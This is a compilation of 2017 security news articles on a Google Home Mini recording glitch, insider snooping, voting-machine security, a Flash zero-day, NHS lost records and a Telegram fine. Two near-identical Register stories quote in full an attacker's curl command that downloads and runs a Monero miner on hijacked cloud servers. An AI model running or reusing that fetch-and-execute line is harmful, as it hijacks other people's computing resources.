STE WILLIAMS

Google Home Mini glitch triggers secret recordings

The privacy glitch that befell Google’s new £49 ($49) Home Mini speaker last week was small but, critics might suggest, still revealing.

The trouble started when journalist Artem Russakovskii, who had been given a review unit at the launch event on 4 October, noticed that the Mini kept turning itself on even when not commanded to.

Deciding to search for clues in the device’s logs, he got a shock:

I opened it up, and my jaw dropped. I saw thousands of items, each with a Play button and a timestamp.

The Mini, it seemed had recorded and uploaded to Google every sound detected in its vicinity for a two-day period, which seemed to be every sound no matter how inconsequential. It even activated after a simple knock on the wall.

This behaviour could be disabled and recordings deleted but only at the expense of harming the system’s future voice recognition accuracy.

What on earth was the Mini playing at?

According to Google, the device had malfunctioned because of a physical problem with the touch panel, which was designed to allow owners to activate recording without using the “OK Google” voice command.

Although this only affected review units handed out during press launches, the company decided to disable the touch feature on all Minis by way of a software update. This process started on 7 October (a day after the errant recording was brought to its attention) and was due to be completed by 15 October.

Concluded Russakovskii:

My Google Home Mini was inadvertently spying on me 24/7 due to a hardware flaw. Google nerfed all Home Minis by disabling the long-press in response, and is now looking into a long-term solution.

For most owners, the usability of the Mini (which doesn’t go on official sale until 19 October), will be unaffected by the software change.

As to its image of the Mini, that might be a bigger issue.

Although resembling a small speaker, the Mini is really a sensor that integrates into Google’s Home platform, which sends the voice commands or questions it receives to a remote server.

Although these activate only after they detect a command such as “OK Google”, by design they are listening all the time in expectation of this.

The system also relates commands to an individual user account. Google allows account holders to control this data as well as mute the Mini, but users must remember to do this. Many probably won’t.

The privacy implications of this system are obvious even as Google dismissed worries that this is just a new form of surveillance dressed up as something useful:

We take user privacy and product quality concerns very seriously. Although we only received a few reports of this issue, we want people to have complete peace of mind while using Google Home Mini.

The incident has echoes Amazon’s troubles when earlier this year it found itself fending off a police request to access recordings made by its Echo speaker in connection with a murder investigation.

Google’s Mini will doubtless probably still sell well – this isn’t another example of the privacy arguments that helped sink Google Glass. But the last thing the company needs is to add fuel to the idea that these devices are, however inadvertently, gateways to a new era of home surveillance.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/E-27cRghtVY/

Why Security Leaders Can’t Afford to Be Just ‘Left-Brained’

The left side of the brain is logical and linear; the right side, creative. You have to use both sides of the brain to connect to your audience in your business.

Although my lifelong passion for technology has served me well, one particular lesson truly transformed my career — the acknowledgment that there are two sides of the brain: the right side, which is the source of creativity, and the left side, where technical thinking takes place.

I’ve always been technically minded — or left-brained — and wanted to understand how things work. But I also developed an appreciation for the right side of the brain, the engine of creativity. A Whole New Mind by Daniel Pink is a great read on left-brain/right-brain theory. It also supports my belief that to be an effective security leader one must learn to use both the technical and creative sides of the brain. Because when we use both sides effectively, new doors are opened.  

Two Sides Are Better Than One 
In my role at CenturyLink, I’ve been raising awareness of our cybersecurity efforts throughout the company, up to and including the boardroom. In the process, I’ve found that using the “two-brained” approach pays dividends.

Technology professionals, including those in cybersecurity, have been trained their whole lives to mostly use the left side of the brain, where most of the math, science, and logic functions occur. From the time they enter school and throughout their careers, technologists are rewarded and encouraged to use their left brain. You set a goal to build or secure a system and you achieve it through careful planning and determination. Sometimes you hit a wall, but you either find a workaround or plow through it.

However, achieving cross-organizational goals requires technical leaders to collaborate and influence senior corporate leadership, all the way up to the board of directors. Many of these senior leaders may not have a technical background, but all of them understand business. Often, technical leaders struggle in communicating with senior leadership because influencing others requires them to use the creative side of their brain.

I’ve seen this occur on several occasions when security leaders presented to a group of executives. When asked about what security gaps or risks the company faced, the security leaders gravitated to the left side, analytic part of the brain. In these situations, the security leaders would typically address the technologies, processes, and people required to secure the enterprise. Their response was logical, factual, and linear — classic left-brain thinking. What they failed to understand was that the executives were primarily interested in how a particular threat might affect the company’s bottom line and return on investment, or lead to additional risk.       

Had these security leaders also used the right side of the brain — which is said to be strong in holistic thinking, intuition, nonverbal cues, and creative visualization — they would have been better able to relate to the executives’ perspective, and as a result better able to respond to their questions.         

It’s important to understand your audience’s points of view and the response you want to elicit from them. When presenting to your executive team, for example, knowing to focus on the threat actors and probable business effects — rather than the technologies and processes — is a more effective way of getting your security budget approved. For that reason, I regularly remind my team to always use both sides of their brain.     

Creativity Can Reveal Alternative Solutions
I’ve also encountered security professionals who are quick to say no to changes within an organization that could enable business transformation. These could be changes to existing security processes, new password rules, or the use of new tools or products. Although security is a top priority, I challenge my team daily to not just refuse but to explain why we have to say no and then seek to understand the perspectives of our audience. I encourage them to use the creative side of the brain to think about alternative solutions.

The following types of questions are often helpful in this process: What is the business driver or goal behind the desired change? Is there another way to address these needs? What additional effort would it take to close the security gap? Can we come up with a more cost-effective security control? Can we modify our rules to simplify the process without increasing risk to the company?

Members of the security team will be more effective in protecting the enterprise if they are viewed as enablers of business transformation rather than inhibitors. Security leaders must learn that many issues shouldn’t be addressed with an either/or conversation. More productive conversations are enabled by the word “and.” For example, instead of thinking “I can either defend the company or implement the requested change,” think “How can I communicate more effectively to influence others, and protect the company?”

Using the creative side of your brain will dramatically increase the chances of gaining cross-organizational buy-in. And obtaining this type of support will enable you to achieve your key goals more easily.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Bill Bradley has been with CenturyLink for 32 years. During that time he has served in a variety of technical roles with increasing responsibilities, including software developer, security manager, CTO, CIO and now as senior vice president of cyber engineering and technology … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/why-security-leaders-cant-afford-to-be-just-left-brained/a/d-id/1330123?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

InfoSec Pros Among Worst Offenders of Employer Snooping

A majority of IT security professionals admit to trolling through company information unrelated to their work — even sensitive material.

IT security professionals often cross the ethical line when it comes to their employer, with 66% of survey respondents admitting that they seek out and access company information that they didn’t need to do their work, according to a survey released today.

The global survey, which queried 913 IT security professionals, found 36% of respondents were willing to take it a step further and admitted to hunting down, or accessing, sensitive company performance information that was irrelevant to their work.

And it turns out that IT security executives were the worst offenders of this snooping behavior, compared to the rest of their team, according to the Dimensional Research survey commissioned by One Identity.

When it comes to general snooping of company information that is not sensitive, 71% of IT security executives admitted to this behavior, compared with 56% of IT security workers who did not hold a managerial position, the survey found.

The percentage of IT security executives willing to track down or access sensitive company performance information was a whopping 40%, compared with 17% for IT security team members who were not in a managerial role.

“I had an IT role in the past. There is always a temptation with privileges to explore where they should not explore. But what surprised me was how pervasive it is,” says Jackson Shaw, senior director of product management for One Identity.

While the survey did not dig into the specific types of sensitive company performance information that IT executives sought, generally this type of information may fall into the realm of company profits and revenue, he noted. As for non-company performance information, IT security professionals may spend trolling through layoff lists, promotion lists, and employee salaries buried within the bowels of the human resources department, Shaw surmised.

“Most file servers at companies are not heavily locked down, and typically the IT security staff has the most privileges, so it’s entirely possible that these people know what the monitoring technology is looking at and know how not to get caught,” says Shaw.

He estimates that less than 50% of companies likely track the movements of their IT security teams and IT administrators as they move through the corporate network and other systems.

The survey also found that 92% of IT security professionals say that employees at their companies attempt to access the information they don’t need to do their work. Also, 44% of IT security pros working at technology companies admit to searching for sensitive company information, compared to 36% at financial services companies or 21% of healthcare companies.

Guarding the Gatekeepers
Cybersecurity ethics is a topic that some colleges, as well as workshops, address. But often the topic of ethics may center on what an IT security professional should do when tracking down and dealing with hackers and cybercriminals.

However, cybersecurity professionals should be held to a higher standard when it comes to their own behavior, says Jane LeClair, president and CEO of the Washington Center for Cybersecurity Research and Development and former dean of the school of business and technology at Excelsior College in Albany, NY.

“As with any profession where sensitive information is available — medical, military, finances, etc. — those who are involved with the care and security of that information should be held to a higher standard,” LeClair says. “With the use of powerful computers, those in the IT arena have been entrusted with not only the ability to access that sensitive data but to safeguard it as well. Part of that responsibility is the intrinsic control to restrain oneself from ‘snooping into material that is beyond the scope of one’s normal area of activity.”

People tend to snoop out of natural curiosity and because their personal sense of accountability has not been adequately developed, LeClair explains.

Personal responsibility stems from a childhood where trust and integrity are ingrained at an early age and then continues through the maturing process that leads to adulthood, she adds, noting that people placed in positions of responsibility before they have “matured” and have developed appropriate life “filters” tend to have errors in judgment.

As for IT security executives who troll through their employer’s data and information that is not tied to their work, LeClair points to an 19th century adage attributed to Lord Acton that power tends to corrupt and absolute power corrupts absolutely.

“Computers are, for now anyway, the ultimate instruments of information and power…. Knowledge is power,” she says. “Executives and people in positions of responsibility seek control of their situations and those that might influence their status. Acquiring knowledge beyond what is personally needed to perform an assigned job or responsibility provides data and insights that can be filed away for future use and self-promotion. The more power and information you attain, the greater your position and the more power and information you seek to maintain your status.”

Can Ethics be Trained?
While it may be human nature to snoop, the filters an individual places on their behavior can be a learned experience, LeClair says.

“Much of that comes from the upbringing you experience from childhood and carries on through schooling and into adulthood. Sadly, in seemingly increasing numbers, people are missing out on developing those filters of personal accountability and trust,” she observes.

In the past, emphasis on attaining computer skills has focused on the nuts and bolts of acquiring those skills and less on “how” those learned skills should be applied, LeClair says.

With the current shortfall of skilled IT professionals, there has been a rush to fill the pipeline with individuals to fill those vacant seats, and in many cases, it seems the rush has increasingly cut short the emphasis on ethics, she adds.

“Wherever training or education is provided, from high schools to colleges, training centers to the workplace, ethics must take a prominent place in the curriculum,” says LeClair. “In many cases, the ethics training that is received today by our cybersecurity students does not provide cases on these types of situations that would present themselves to the cyber professional.”

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

 

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/infosec-pros-among-worst-offenders-of-employer-snooping/d/d-id/1330146?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google Bolsters Security for Select Groups

Business leaders, political campaign teams, journalists, and other high-risk groups will receive advanced email and account protection.

Google is launching an “advanced protection program” that aims to offer greater email and account protection to journalists, business leaders, political campaign teams, and other high-risk individuals that may be subject to a cyberattack, the Alphabet company announced today.

Under its program, participants will be required to sign into their accounts with a password and physical security key fob, rather than use traditional two-step verification such as a password and code sent via SMS or the Google Authenticator app.

Users will also be given limited app access. Third-party apps, which security experts say is less secure than apps in Google’s Play Store or Apple’s App Store, will automatically lose permission to access sensitive data from Google Drive files and emails. Users will need to use the Gmail app or Inbox by Gmail for access to these third-party apps.

Account recovery will take longer and require additional steps for “advanced protection program” users, Google warns. If a user loses access to their account and both security keys, they will need to take additional verification steps that may take a “few days to restore access” to their account, Google states.

Read more about the “advanced protection program” here.

 

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/endpoint/google-bolsters-security-for-select-groups/d/d-id/1330149?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The fix is in for hackable voting machines: use paper

Want better security of election voting results? Use paper.

With the US almost halfway between the last national election and the 2018 mid-terms, not nearly enough has been done yet to improve the demonstrated insecurity of current electronic voting systems. Multiple experts say one obvious, fundamental move should be to ensure there is a paper trail for every vote.

That was a major recommendation at a panel discussion this past week that included representatives of the hacker conference DefCon and the Atlantic Council think tank, which concluded that while there is progress, it is slow.

The progress includes the designation of voting systems as critical infrastructure by the Department of Homeland Security, plus moves in Texas and Virginia to improve the security of their systems by using paper.

Most states already do that. But Lawrence Norden, co-author of a September 2015 report for the Brennan Center for Justice titled “America’s Voting Machines at Risk,” wrote in a blog post last May for The Atlantic that 14 states, “including some jurisdictions in Georgia, Pennsylvania, Virginia, and Texas – still use paperless electronic voting machines. These systems should be replaced as soon as possible.”

There is little debate about the porous nature of electronic voting systems – it has been reported for years. It was close to four years ago, in January 2014 that the bipartisan Presidential Commission on Election Administration (PCEA) declared:

There is an impending crisis … from the widespread wearing out of voting machines purchased a decade ago. … Jurisdictions do not have the money to purchase new machines, and legal and market constraints prevent the development of machines they would want even if they had funds.

A couple of years later the Brennan Center issued its report, which predicted that in the 2016 elections, 43 states would be using electronic voting machines that were at least 10 years old – “perilously close to the end of most systems’ expected lifespan.”

The biggest risk from that, the report said, was failures and crashes, which could lead to long lines at voting locations and lost votes. But it also said security risks were at unacceptable levels:

Virginia recently decertified a voting system used in 24 percent of precincts after finding that an external party could access the machine’s wireless features to “record voting data or inject malicious data.

Smaller problems can also shake public confidence. Several election officials mentioned “flipped votes” on touch screen machines, where a voter touches the name of one candidate, but the machine registers it as a selection for another.

Not to mention that with solely digital voting machines, there is no way to audit the results.

While there is still no documented evidence that hostile nation states – mainly Russia – have been able to tamper directly with election results, the risk is there. At this past summer’s DefCon conference, one of the most high-profile events was the so-called Voting Village, where Wired reported that, “hundreds of hackers got to physically interact with – and compromise – actual US voting machines for the first time ever.”

The reason it hadn’t been done before, at least publicly, was that it was illegal. But at the end of 2016, an exemption to the Digital Millennium Copyright Act finally legalized hacking of voting machines for research purposes.

Not surprisingly, hackers didn’t have all that much trouble – they found multiple ways to breach the systems both physically and with remote access. And according to Jake Braun, a DefCon Voting Village organizer and University of Chicago researcher, the results undermined the claim that the decentralized voting system in the US (there are more than 8,000 jurisdictions in the 50 states) would make it more difficult to hack.

With only a handful of companies manufacturing electronic voting machines, a single compromised supply chain could impact elections across multiple states at once, he noted.

It’s not just tampering with actual voting results that can damage the credibility of an election either. Norden told Wired that, “you can do a lot less than that and do a lot of damage… If you have machines not working, or working slowly, that could create lots of problems too, preventing people from voting at all.”

Norden doesn’t dismiss the need for technology improvements. “Among the wide variety of solutions being explored or proposed are use of encryption, blockchain, and open source software,” he wrote in his blog post.

But the most effective security measure, he contended in his blog post, is low-tech:

The most important technology for enhancing security has been around for millennia: paper. Specifically, every new voting machine in the United States should have a paper record that the voter reviews, and that can be used later to check the electronic totals that are reported.

This could be a paper ballot the voter fills out before it is scanned by a machine, or a record created by the machine on which the voter makes her selections—so long as she can review that record and make changes before casting her vote.

That kind of improvement doesn’t have to take a lot of time or cost big bucks either, he said, and would create, “software independent” voting systems, where an, “undetected change or error in its software cannot cause an undetectable change or error in an election outcome.”

Given what are sure to be continued attempts at foreign interference in US elections, “it is the least we can do,” he said.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Wq9bJT5sSYs/

Crypto-coin miners caught toiling away in hacked cloud boxes

Here’s yet another reason to make sure you lock down your clutch of cloud services: cryptocurrency mining.

Security outfit RedLock’s security trends report [PDF], out this month, said developers and organizations are not securing their AWS, Azure and Google Cloud Platform systems, allowing miscreants to hijack them to steal processor cycles for digging up alt-coins. It’s believed hackers are able to get into boxes by using their default credentials.

RedLock says companies stung this way included security company Gemalto and insurer Aviva.

Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report stated.

It’s one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 Terawatt-hours, and it takes 215 kWH for a single transaction.

However, you’d be a fool to mine Bitcoin in the cloud when newbie currency Monero is much easier to craft, and one XMR is worth about $95 right now. Most web-based miners – such Coin Hive’s spotted on various websites – dig up Monero cash at a rapid pace on commodity hardware.

In Aviva’s case, RedLock says the cyber-dosh miner was discovered running in a MySQL container, and it communicated back to a Gmail account. The randomized inbox hinted that someone has automated the process of locating insecure containers and setting up miners within them, and the biz reckoned that theory is supported by this Reddit post.

In that thread, a Redditor uploaded code nearly identical to the command line RedLock found running on Aviva’s server, with the same email recipient:

curl -L http://208.115.205.133:8220/minerd -o minerd;chmod 777 minerd  setsid ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

Change those credentials, people. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/17/cryptocoin_miners_turning_up_on_unprotected_cloud_instances/

NHS: Remember those patient records we didn’t deliver? Well, we found another 162,000

NHS leaders have admitted that the biggest ever loss of patient documents is worse than initially thought, as another 162,000 undelivered documents have been discovered.

The scandal was first revealed back in February, when the NHS was forced to admit that 709,000 items of correspondence – which includes details of patients’ test results, change-of-address forms and other personal information – had gone undelivered.

The error by NHS Shared Business Services (SBS) – a joint venture between Steria and the NHS – meant that between 2011 and 2016, these documents were left gathering dust in a warehouse.

A team was tasked with investigating the incident, which included assessing whether the information had adversely affected patients’ health, and it was thought that the situation was under control.

However, NHS England chief executive Simon Stevens on Monday told the Public Accounts Committee that some more undelivered records had turned up in the course of the investigation.

He said that, as part of the work, the team had looked at whether clinicians had stuck to processes introduced in 2015 that intended to improve the transfer of NHS documents – and discovered that there were about 5 per cent of cases “where that hasn’t been happening”.

Pressed on what this was in real numbers, Stevens said it meant there were about 150,000 more records that needed to be “repatriated” to the relevant GP practices.

On top of this, the team dealing with the incident investigated local offices across the country and found a further 12,000 SBS items languishing undelivered.

Karen Williams, the former director of transformation and corporate operations at NHS England (she now works at HMRC), said that this was because these boxes “had been assumed to be records for filing and therefore hadn’t been processed”.

Committee members were clearly exasperated by the latest admission, with chairman Meg Hillier saying that they had expected to “be beginning to wrap this up”.

“We’re very disappointed to still be discovering more problems,” she added.

Geoffrey Clifton-Brown, meanwhile, expressed dismay that the execs had “started this hearing very confidently” when discussing progress on the initial tranche.

“Then you tell us this bombshell… what’s the situation today for dealing with the backlog?”

In response, Stevens said that the team was applying the same triaging processes to the new records, which involved first making sure the relevant GPs received the records, and then having them vetted for clinically important information.

He said the NHS expected to have all the records back with GPs by the end of December for initial assessment, and that the end of March was “feasible” for finishing the whole project.

Of course, this extra work is going to cost. The government stumped up £2.5m to deal with the initial portion of documents, which is being used partly to fund GP practices that have to search through the medical records.

When pushed on the extra resources needed to deal with this final stage, Stevens said that he couldn’t give a further number on it, but “would say in the zone of a million, rather than £2.5m”.

Stevens also detailed progress on the original 709,000 items, saying that 5,562 cases had been sent for a full clinical review, and of these 4,565 had been completed.

Some 3,624 have been clearly shown not to have caused harm, with the remaining 941 awaiting a final clinical review. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/17/nhs_finds_another_162000_unprocessed_patient_records/

Flash 0-day in the wild – patch now!

This past Patch Tuesday, Adobe released, well, nothing. Given that the past few months of Adobe Patch Tuesdays have been gradually diminishing, perhaps some of us thought these Flash-related patches were going the way of the dodo.

Alas, it was wishful thinking.

Six days after Patch-Tuesday-that-wasn’t, Adobe has released an out-of-band patch for Flash in response to a zero-day vulnerability that’s being exploited in the wild.

This Flash vulnerability, CVE-2017-11292, could allow remote code execution, and is rated as Critical. It affects Flash both in browsers and on desktop players, on Windows, Mac, Linux, and Chrome OS.

Adobe notes that this vulnerability is being exploited in the wild, specifically by a criminal group that has previously used other Flash vulnerabilities to carry out their attacks.

Sophos disrupts the attack by blocking the URL that malware is downloaded from, and by detecting the malware itself as Mal/Generic-S.

Nevertheless, if you’re still using Adobe Flash, you should patch right away.

But better yet, get rid of Flash altogether (if you can).

Even Adobe knows that its beleaguered media player’s days are numbered. Browser vendors have been trying to sweep it further and further under the rug for years and in July Adobe announced that it was finally pulling the plug.

By the end of 2020.

Given this progress, and in collaboration with several of our technology partners – including Apple, Facebook, Google, Microsoft and Mozilla – Adobe is planning to end-of-life Flash. Specifically, we will stop updating and distributing the Flash Player at the end of 2020 and encourage content creators to migrate any existing Flash content to these new open formats.

There’s another forty or so Patch Tuesdays between now and then.

Flash’s days are very numbered but it’s having an agonising, protracted exit. For everyone’s sake its demise really can’t come soon enough. Adobe’s waiting until 2021, you don’t have to.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/MDk66PpmKfc/

Russia tweaks Telegram with tiny fine for decryption denial

Encrypted messaging app Telegram must pay 800,000 roubles for resisting Russia’s FSB’s demand that it help decrypt user messages.

The fine translates to just under US$14,000, making it less of a serious punishment and more a shot across the bows.

However, it does seem to entrench the principle that the Federal Security Service of the Russian Federation (FSB) can demand decryption.

Moscow signalled its intention to crack down last year with legislation put to the Duma, proposing fines up to a million roubles for the administrative offence of not giving keys to the FSB.

Telegram’s head office received its summons in July, according to this Russian-language report from the BBC. The summons demanded information about six numbers registered on the Telegram.

Judge Yulia Danilchik of the 383 Meshchansky District Court of Justice made the guilty finding and imposed the fine.

Telegram founder Pavel Durov has posted to Russian social site VK.com that it’s not possible to comply.

“In addition to the fact that the requirements of the FSB are not technically feasible, they contradict Article 23 of the Constitution of the Russian Federation: ‘Everyone has the right to privacy of correspondence, telephone conversations, postal, telegraphic and other communications,’” he wrote.

He indicated his intention to appeal, and keep doing so “until the claim of the FSB is considered by a judge familiar with the basic law of Russia – its Constitution”. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/17/russia_fines_telegram/

Bitcoin miners turning up on unprotected cloud instances

Here’s yet another reason to make sure you secure your cloud console: cryptocurrency mining.

Security outfit RedLock’s September security trends report [PDF] says cloud customers that leave default settings on their AWS, Azure and Google Cloud Platform configurations have inadvertently donated processor cycles to surreptitious coin-miners.

RedLock says companies stung this way included security company Gemalto and insurer Aviva.

Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report says.

It’s one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 Terawatt-hours, and it takes 215 kWH for a single transaction.

In Aviva’s case, RedLock says the miner was discovered in a MySQL container, and it communicated back to a Gmail account.

The randomised Gmail account hinted that someone’s automated the process of locating insecure containers and setting up their miners, and the company says that idea is supported by this Reddit post.

The Redditor posted code the same as RedLock found on Aviva’s server, with the same e-mail recipient:

curl -L http://208.115.205.133:8220/minerd -o minerd;chmod 777 minerd  setsid ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x

Change those credentials, people. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/17/bitcoin_miners_turning_up_on_unprotected_cloud_instances/